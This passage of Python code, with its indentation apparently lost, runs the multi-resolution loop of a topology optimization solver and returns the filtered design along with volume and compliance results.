solver = Solver(nelx, nely, params, params.problemType, bc, gui)
x = solver.optimize(x, enforce_constraints=(level > 0))
if params.hasGui:
solver.filtering.filter_variables(x, solver.x_phys)
gui.update(solver.x_phys)
# Go to next level
if level < params.numLevels - 1:
nelx *= 2
nely *= 2
params.exemplarDownsampling /= 2.0
params.maxSolverStep //= 2
params.lengthSquare /= 2.0
print("")
# Filter last result to obtain physical variables
solver.filtering.filter_variables(x, solver.x_phys)
results = {
"last_optimum": solver.last_optimum_value(),
"volume": sum(solver.x_phys) / len(solver.x_phys)}
if params.problemType == ProblemType.AppearanceWithMaxCompliance:
results["compliance_factor"] = solver.compliance_max / min_compliance
return (solver.x_phys, nelx, nely, results)
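# Note on the level loop above (a reading of the code, not original docs): each
# finer level doubles nelx/nely and upsamples the previous design, while
# exemplarDownsampling, maxSolverStep and lengthSquare are halved so the exemplar
# scale and solver budget stay consistent with the finer grid.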
|